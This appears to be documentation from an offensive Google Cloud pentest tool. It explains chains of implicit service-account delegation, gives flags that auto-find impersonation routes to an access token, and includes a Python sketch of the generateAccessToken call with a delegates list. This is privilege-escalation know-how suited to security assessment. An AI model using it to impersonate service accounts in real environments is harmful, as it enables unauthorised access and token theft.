Implicit Delegation: Review the concept of implicit delegation via recently released articles. In essence, a user or service account can have implicit delegation rights on a service account, which in turn can have implicit delegation rights on another service account, and so on. At the end of this implicit delegation chain, a service account might be able to call an API to generate an access token for a final service account. As the "starting node" of this implicit delegation chain, you can leverage this to get the access token from that final API call. To this effect, there are several flags to pass in (a sketch of the underlying API call follows this list):

  • --all-delegation: Based off data enumerated thus far, auto-detect impersonation routes that end in getting an access token, and present all of them to the end user. Note the only caveat is your caller needs impersonation permissions on that first node. Also, to auto-detect routes you need to gather the data via modules run enum_all, or modules run enum_service_accounts followed by modules run enum_policy_bindings
  • --delegation-target: Generate all impersonation routes that end with the delegation target and return that to the end user
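For reference, a rough sketch of the generateAccessToken call that sits at the end of a delegation chain, using the IAM Credentials REST API directly (the emails and token below are placeholders):

# Sketch: generating an access token for a target SA through a delegation chain.
import requests

ACCESS_TOKEN = "[access_token]"  # token for the "starting node" identity
TARGET_SA = "final-sa@[project_id].iam.gserviceaccount.com"

resp = requests.post(
    f"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/{TARGET_SA}:generateAccessToken",
    headers={"Authorization": f"Bearer {ACCESS_TOKEN}"},
    json={
        # Intermediate hops, in order, between the caller and the target SA
        "delegates": ["projects/-/serviceAccounts/middle-sa@[project_id].iam.gserviceaccount.com"],
        "scope": ["https://www.googleapis.com/auth/cloud-platform"],
        "lifetime": "3600s",
    },
)
print(resp.json())  # "accessToken" and "expireTime" on success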